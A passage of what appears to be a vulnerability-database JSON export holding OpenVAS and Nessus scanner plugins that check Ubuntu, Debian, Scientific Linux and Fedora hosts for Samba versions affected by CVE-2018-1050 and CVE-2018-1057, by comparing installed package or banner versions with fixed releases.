(CVE-2018-1050)\");\n script_tag(name:\"affected\", value:\"samba on Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3595-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3595-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.3.11+dfsg-0ubuntu0.14.04.14\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.3.11+dfsg-0ubuntu0.14.04.14\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.6.7+dfsg-1ubuntu3.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.6.7+dfsg-1ubuntu3.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.3.11+dfsg-0ubuntu0.16.04.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.3.11+dfsg-0ubuntu0.16.04.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "scanner", "description": "Multiple Vulnerabilities in Samba 4.0 onward.", "modified": "2018-10-26T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310113133", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113133", "title": "Samba 4 Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_samba_mult_vuln.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Samba 4 Multiple Vulnerabilities\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113133\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:45:55 +0100 (Wed, 14 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n\n script_name(\"Samba 4 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_samba_detect.nasl\");\n script_mandatory_keys(\"samba/smb_or_ssh/detected\");\n\n script_tag(name:\"summary\", value:\"Multiple Vulnerabilities in Samba 4.0 onward.\");\n script_tag(name:\"vuldetect\", value:\"The script checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"There exist two vulnerabilities:\n\n - Samba is vulnerable to a denial of service attack when the RPC spoolss service is configured to be run as\n an external daemon. 
Missing input sanitization checks on some of the input parameters to spoolss RPC calls\n could cause the print spooler service to crash.\n\n - On a Samba AD DC the LDAP server in Samba incorrectly validates permissions to modify passwords over LDAP\n allowing authenticated users to change any other users' passwords, including administrative users and privileged\n service accounts (eg Domain Controllers).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would result in effects ranging from Denial of Service to Privilege Escalation,\n eventually allowing an attacker to gain full control over the target system.\");\n\n script_tag(name:\"affected\", value:\"Samba 4.x.x before 4.5.16, 4.6.x before 4.6.14 and 4.7.x before 4.7.6.\");\n\n script_tag(name:\"solution\", value:\"Update to Samba version 4.5.16, 4.6.14 or 4.7.6 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://www.samba.org/samba/security/CVE-2018-1050.html\");\n script_xref(name:\"URL\", value:\"https://www.samba.org/samba/security/CVE-2018-1057.html\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:samba:samba\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\nvers = infos['version'];\nloc = infos['location'];\n\nif( version_in_range( version: vers, test_version: \"4.0.0\", test_version2: \"4.5.15\" ) ) {\n fixed_ver = \"4.5.16\";\n}\n\nif( version_in_range( version: vers, test_version: \"4.6.0\", test_version2: \"4.6.13\" ) ) {\n fixed_ver = \"4.6.14\";\n}\n\nif( version_in_range( version: vers, test_version: \"4.7.0\", test_version2: \"4.7.5\" ) ) {\n fixed_ver = \"4.7.6\";\n}\n\nif( ! 
isnull( fixed_ver ) ) {\n report = report_fixed_ver( installed_version: vers, fixed_version: fixed_ver, install_path: loc );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:42", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in Samba, a SMB/CIFS file,\nprint, and login server for Unix. The Common Vulnerabilities and\nExposures project identifies the following issues:\n\nCVE-2018-1050\nIt was discovered that Samba is prone to a denial of service\nattack when the RPC spoolss service is configured to be run as an\nexternal daemon.\n\nCVE-2018-1057\nBjoern Baumbach from Sernet discovered that on Samba 4 AD DC the\nLDAP server incorrectly validates permissions to modify passwords\nover LDAP allowing authenticated users to change any other users\npasswords, including administrative users.", "modified": "2019-07-04T00:00:00", "published": "2018-03-13T00:00:00", "id": "OPENVAS:1361412562310704135", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704135", "title": "Debian Security Advisory DSA 4135-1 (samba - security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4135-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope 
that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704135\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_name(\"Debian Security Advisory DSA 4135-1 (samba - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-13 00:00:00 +0100 (Tue, 13 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4135.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"samba on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), CVE-2018-1050 will be addressed\nin a later update. 
Unfortunately the changes required to fix\nCVE-2018-1057 for Debian oldstable are too invasive to be backported.\nUsers using Samba as an AD-compatible domain controller are encouraged\nto apply the workaround described in the Samba wiki and upgrade to\nDebian stretch.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 2:4.5.12+dfsg-2+deb9u2.\n\nWe recommend that you upgrade your samba packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/samba\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in Samba, a SMB/CIFS file,\nprint, and login server for Unix. The Common Vulnerabilities and\nExposures project identifies the following issues:\n\nCVE-2018-1050\nIt was discovered that Samba is prone to a denial of service\nattack when the RPC spoolss service is configured to be run as an\nexternal daemon.\n\nCVE-2018-1057\nBjoern Baumbach from Sernet discovered that on Samba 4 AD DC the\nLDAP server incorrectly validates permissions to modify passwords\nover LDAP allowing authenticated users to change any other users\npasswords, including administrative users.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ctdb\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libnss-winbind\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpam-winbind\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libparse-pidl-perl\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:4.5.12+dfsg-2+deb9u2\", 
rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient-dev\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"python-samba\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"registry-tools\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dev\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-libs\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-testsuite\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-vfs-modules\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"winbind\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.5, "vector": 
"AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-03T12:14:07", "bulletinFamily": "scanner", "description": "Security Fix(es) :\n\n - samba: NULL pointer indirection in printer server\n process (CVE-2018-1050)", "modified": "2019-11-02T00:00:00", "id": "SL_20180619_SAMBA_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/110891", "published": "2018-07-03T00:00:00", "title": "Scientific Linux Security Update : samba on SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110891);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2017-2619\", \"CVE-2018-1050\");\n\n script_name(english:\"Scientific Linux Security Update : samba on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - samba: NULL pointer indirection in printer server\n process (CVE-2018-1050)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1807&L=scientific-linux-errata&F=&S=&P=2074\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d6981f8f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-devel-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-client-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-common-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-debuginfo-3.6.23-51.el6\")) flag++;\nif 
(rpm_check(release:\"SL6\", reference:\"samba-doc-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-domainjoin-gui-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"samba-glusterfs-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-swat-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-clients-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-devel-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-krb5-locator-3.6.23-51.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:31:04", "bulletinFamily": "scanner", "description": "Security fix for CVE-2018-1050 CVE-2018-1057\n\n----\n\nUpdate to Samba 4.6.13\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2018-7D0ACD608B.NASL", "href": "https://www.tenable.com/plugins/nessus/108501", "published": "2018-03-21T00:00:00", "title": "Fedora 26 : 2:samba (2018-7d0acd608b)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-7d0acd608b.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108501);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/23 11:21:07\");\n\n script_cve_id(\"CVE-2018-1050\", 
\"CVE-2018-1057\");\n script_xref(name:\"FEDORA\", value:\"2018-7d0acd608b\");\n\n script_name(english:\"Fedora 26 : 2:samba (2018-7d0acd608b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2018-1050 CVE-2018-1057\n\n----\n\nUpdate to Samba 4.6.13\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-7d0acd608b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"samba-4.6.14-0.fc26\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-09T11:33:52", "bulletinFamily": "scanner", "description": "The version of Samba running on the remote host is 4.5.x prior to\n4.5.16, or 4.6.x prior to 4.6.14, or 4.7.x prior to 4.7.6. 
It is,\ntherefore, affected by a remote DoS and a remote password manipulation\nvulnerability.\n\nNote: Refer to the advisories for possible workarounds.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "modified": "2019-11-02T00:00:00", "id": "SAMBA_4_7_6.NASL", "href": "https://www.tenable.com/plugins/nessus/108378", "published": "2018-03-15T00:00:00", "title": "Samba 4.5.x < 4.5.16 / 4.6.x < 4.6.14 / 4.7.x < 4.7.6 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108378);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_bugtraq_id(103382, 103387);\n\n script_name(english:\"Samba 4.5.x < 4.5.16 / 4.6.x < 4.6.14 / 4.7.x < 4.7.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Samba.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Samba running on the remote host is 4.5.x prior to\n4.5.16, or 4.6.x prior to 4.6.14, or 4.7.x prior to 4.7.6. 
It is,\ntherefore, affected by a remote DoS and a remote password manipulation\nvulnerability.\n\nNote: Refer to the advisories for possible workarounds.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2018-1050.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2018-1057.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.5.16.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.6.14.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.7.6.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Samba version 4.5.16 / 4.6.14 / 4.7.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1057\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/15\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\n\nif (\"Samba \" >!< lanman) audit(AUDIT_NOT_LISTEN, \"Samba\", port);\n\nversion = lanman - 'Samba ';\n\nif (version =~ \"^4(\\.[5-9])?$\")\n audit(AUDIT_VER_NOT_GRANULAR, \"Samba\", port, version);\n\nfix = NULL;\n\nregexes = make_array(-2, \"a(\\d+)\", -1, \"rc(\\d+)\");\n\n# Affected :\n# Note versions prior to 4.6 are EoL\n# https://wiki.samba.org/index.php/Samba_Release_Planning\n#\n# We are including a 4.5.x check because they did release 4.5.16\n# 4.5.x < 4.5.16\n# 4.6.x < 4.6.14\n# 4.7.x < 4.7.6\nif (version =~ \"^4\\.5\\.\")\n fix = 